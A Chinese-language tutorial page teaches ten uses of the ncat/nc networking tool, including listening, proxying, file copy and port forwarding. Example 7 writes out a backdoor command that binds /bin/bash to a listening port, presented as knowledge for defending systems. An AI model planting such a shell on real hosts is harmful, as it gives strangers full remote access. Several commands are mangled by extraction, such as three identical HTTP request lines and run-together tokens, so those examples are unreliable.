0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

通过 10 个例子来学习如何使用 nc 命令

Linux爱好者 2018-02-06 09:55 次阅读
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

ncat或者说nc是一款功能类似cat的工具,但是是用于网络的。它是一款拥有多种功能的 CLI 工具,可以用来在网络上读、写以及重定向数据。 它被设计成可以被脚本或其他程序调用的可靠的后端工具。同时由于它能创建任意所需的连接,因此也是一个很好的网络调试工具。

ncat/nc既是一个端口扫描工具,也是一款安全工具,还能是一款监测工具,甚至可以做为一个简单的 TCP 代理。 由于有这么多的功能,它被誉为是网络界的瑞士军刀。 这是每个系统管理员都应该知道并且掌握它。

在大多数 Debian 发行版中,nc是默认可用的,它会在安装系统的过程中自动被安装。 但是在 CentOS 7 / RHEL 7 的最小化安装中,nc并不会默认被安装。 你需要用下列命令手工安装。

[root@linuxtechi ~]# yum install nmap-ncat -y

系统管理员可以用它来审计系统安全,用它来找出开放的端口然后保护这些端口。管理员还能用它作为客户端来审计 Web 服务器、telnet 服务器、邮件服务器等, 通过nc我们可以控制发送的每个字符,也可以查看对方的回应。

我们还可以用它捕获客户端发送的数据以此来了解这些客户端是做什么的。

在本文中,我们会通过 10 个例子来学习如何使用nc命令。

例子: 1) 监听入站连接

通过-l选项,ncat可以进入监听模式,使我们可以在指定端口监听入站连接。 完整的命令是这样的:

$ ncat -l port_number

比如,

$ ncat -l 8080

服务器就会开始在 8080 端口监听入站连接。

例子: 2) 连接远程系统

使用下面命令可以用nc来连接远程系统,

$ ncat IP_address port_number

让我们来看个例子,

$ ncat 192.168.1.100 80

这会创建一个连接,连接到 IP 为 192.168.1.100 的服务器上的 80 端口,然后我们就可以向服务器发送指令了。 比如我们可以输入下面内容来获取完整的网页内容

GET / HTTP/1.1

或者获取页面名称,

GET / HTTP/1.1

或者我们可以通过以下方式获得操作系统指纹标识,

GET / HTTP/1.1

这会告诉我们使用的是什么软件来运行这个 web 服务器的。

例子: 3) 连接 UDP 端口

默认情况下,nc创建连接时只会连接 TCP 端口。 不过我们可以使用-u选项来连接到 UDP 端口,

$ ncat -l -u 1234

现在我们的系统会开始监听 UDP 的 1234 端口,我们可以使用下面的netstat命令来验证这一点,

$netstat -tunlp | grep1234

udp 000.0.0.0:1234 0.0.0.0:* 17341/nc

udp600 :::1234:::*

假设我们想发送或者说测试某个远程主机 UDP 端口的连通性,我们可以使用下面命令,

$ ncat -v -u {host-ip} {udp-port}

比如:

[root@localhost ~]# ncat -v -u 192.168.105.150 53

Ncat: Version6.40(http://nmap.org/ncat )

Ncat: Connected to192.168.105.150:53。

例子: 4) 将nc作为聊天工具

nc也可以作为聊天工具来用,我们可以配置服务器监听某个端口,然后从远程主机上连接到服务器的这个端口,就可以开始发送消息了。 在服务器这端运行:

$ ncat -l 8080

在远程客户端主机上运行:

$ ncat 192.168.1.100 8080

之后开始发送消息,这些消息会在服务器终端上显示出来。

例子: 5) 将nc作为代理

nc也可以用来做代理。比如下面这个例子,

$ ncat -l 8080 | ncat 192.168.1.200 80

所有发往我们服务器 8080 端口的连接都会自动转发到 192.168.1.200 上的 80 端口。 不过由于我们使用了管道,数据只能被单向传输。 要同时能够接受返回的数据,我们需要创建一个双向管道。 使用下面命令可以做到这点:

$mkfifo2way

$ncat -l80800<2way | ncat192.168.1.200801>2way

现在你可以通过nc代理来收发数据了。

例子: 6) 使用nc拷贝文件

nc还能用来在系统间拷贝文件,虽然这么做并不推荐,因为绝大多数系统默认都安装了ssh/scp。 不过如果你恰好遇见个没有ssh/scp的系统的话, 你可以用nc来作最后的努力。

在要接受数据的机器上启动nc并让它进入监听模式:

$ ncat -l8080 > file.txt

现在去要被拷贝数据的机器上运行下面命令:

$ ncat 192.168.1.100 8080 --send-only < data.txt

这里,data.txt是要发送的文件。-–send-only选项会在文件拷贝完后立即关闭连接。 如果不加该选项, 我们需要手工按下ctrl+c来关闭连接。

我们也可以用这种方法拷贝整个磁盘分区,不过请一定要小心。

例子: 7) 通过nc创建后门

nc命令还可以用来在系统中创建后门,并且这种技术也确实被黑客大量使用。 为了保护我们的系统,我们需要知道它是怎么做的。 创建后门的命令为:

$ ncat -l 10000 -e /bin/bash

-e标志将一个 bash 与端口 10000 相连。现在客户端只要连接到服务器上的 10000 端口就能通过 bash 获取我们系统的完整访问权限:

$ ncat 192.168.1.100 10000

例子: 8) 通过nc进行端口转发

我们通过选项-c来用nc进行端口转发,实现端口转发的语法为:

$ ncat -u -l80 -c'ncat -u -l 8080'

这样,所有连接到 80 端口的连接都会转发到 8080 端口。

例子: 9) 设置连接超时

nc的监听模式会一直运行,直到手工终止。 不过我们可以通过选项-w设置超时时间:

$ ncat -w 10 192.168.1.100 8080

这回导致连接 10 秒后终止,不过这个选项只能用于客户端而不是服务端。

例子: 10) 使用-k选项强制nc待命

当客户端从服务端断开连接后,过一段时间服务端也会停止监听。 但通过选项-k我们可以强制服务器保持连接并继续监听端口。 命令如下:

$ ncat -l -k 8080

现在即使来自客户端的连接断了也依然会处于待命状态。

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • Linux
    +关注

    关注

    88

    文章

    11628

    浏览量

    217951
  • TCP
    TCP
    +关注

    关注

    8

    文章

    1417

    浏览量

    83013
  • NC
    NC
    +关注

    关注

    0

    文章

    21

    浏览量

    14372

原文标题:10 个例子教你学会 ncat (nc) 命令

文章出处:【微信号:LinuxHub,微信公众号:Linux爱好者】欢迎添加关注!文章转载请注明出处。

收藏 人收藏
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

    评论

    相关推荐
    热点推荐

    是德示波器自动化测试SCPI命令控制指南

    是德示波器通过标准命令接口SCPI(Standard Commands for Programmable Instruments)实现自动化控制,为测试系统集成与高效调试提供强大支持。本文结合其核心
    的头像 发表于 09-23 17:54 1213次阅读
    是德示波器自动化测试SCPI<b class='flag-5'>命令</b>控制指南

    Linux基础命令which详解

    在Linux系统中,which命令用于查找并显示指定命令的可执行文件路径。这对于系统管理员和开发人员来说是一个非常有用的工具,可以帮助定位命令所在的位置,确认命令是否已正确安装,并且能
    的头像 发表于 07-29 17:58 590次阅读

    labview通过JKL.net发送cmd命令行问题

    请问通过电脑直接发ssh命令,能正常输出,但通过JKL.net发送,提示\'\'ssh\'\'不是内部命令,如何解决?
    发表于 07-02 21:11

    使用CCG2 (CYPD2122-24LQXI) IC,对源发送的 SVDM DISCOVERY IDENTITY命令的响应有问题,怎么解决?

    中的笔记本示例。 这个例子是否需要任何修改来从源请求发现 ID 命令? 我从EZ-PD™配置工具刷新固件和配置并尝试了许多设置,但从未收到发现 ID 命令的响应。 我应该怎么办?
    发表于 05-08 07:08

    NC401-C50H噪声二极管Noisecom 现货库存

    NC401-C50H噪声二极管Noisecom 现货库存NC401-C50H 是 Noisecom 公司生产的噪声二极管,属于 Noisecom 的NC400系列噪声二极管,能产生对称的高斯白噪声
    发表于 04-08 10:01

    使用NXP MCX-N板卡新增命令控制

    此次任务通过串口命令行控制RGB LED,相比较与上一次任务通过单个字符控制增加了FreeRTOS-CLI组件,支持更复杂的、带参数的命令
    的头像 发表于 03-17 13:38 1489次阅读
    使用NXP MCX-N板卡新增<b class='flag-5'>命令</b>控制

    Linux常用命令行总结

    学习了一段时间的linux之后,开始着手基本命令学习,这里主要记录一些学习过程中重要的知识点供以后查阅。
    的头像 发表于 03-03 10:40 806次阅读
    Linux常用<b class='flag-5'>命令</b>行总结

    NC401(C10)噪声二极管Noisecom

    NC401(C10)噪声二极管Noisecom NC401(C10)噪声二极管是Noisecom公司生产的一种高频噪声二极管,属于NC400
    发表于 03-03 09:54

    如何运用MATLAB来控制DLP4500?

    希望通过用MATLAB来实现对DLP4500 的控制?因为现在MATLAB可以控制相机,希望也直接控制DLP。 是否有相关的例子来参考。谢谢
    发表于 03-03 06:19

    通过FPGA控制DAC5682Z, 计算得到的结果是64bit,怎样通过DAC输出?

    通过FPGA 控制DAC5682Z, 计算得到的结果是64bit,怎样通过DAC输出? 看到一个例子通过双数据率采样(DDR),将输入的64bit数据分成4个16-bit数据输入到
    发表于 02-14 06:42

    VirtualLab Fusion应用:对超短脉冲的色散效应的研究

    还用这个例子来展示VirtualLab Fusion的脉冲评估检测器的能力。在第二个例子中,我们研究了在电介质或金属涂层镜面上的反射所产生的色散效应。 **镜面涂层对脉冲特性的影响 ** 我们展示了
    发表于 01-21 10:02

    常用linux命令

    使用command A | command B | command C命令,将A命令产生的标准输出作为B命令的标准输入(注意只能接收前一个命令的标准输出)。
    的头像 发表于 01-20 14:26 660次阅读

    基于FPGA的电子琴设计

    简单的例子来让大家去系统的学习和认识FPGA。本次的电子琴设计也算是一次简单的各个模块的联系调用的一个过程,也可以帮助各位去加深理解,多动手,熟练掌握会有意想不到的效果。
    的头像 发表于 01-20 14:07 1244次阅读
    基于FPGA的电子琴设计

    对超短脉冲的色散效应的研究

    还用这个例子来展示VirtualLab Fusion的脉冲评估检测器的能力。在第二个例子中,我们研究了在电介质或金属涂层镜面上的反射所产生的色散效应。 **镜面涂层对脉冲特性的影响 ** 我们展示了
    发表于 12-25 15:29

    ADS8326采样AD值,一直跳动10来个点,是什么原因引起的?

    ADS8326,目前测试情况不是很理想,暂时无法排查出什么原因,现在的现象是: 采样AD值,一直跳动10来个点。而我们现在实际要求的比较高,要保证跳动1-3个点。举个例子,就是我现在连续采200个点,采到的ad值都是19711,然后莫名其妙的就会有一两个点变成19727
    发表于 12-20 06:44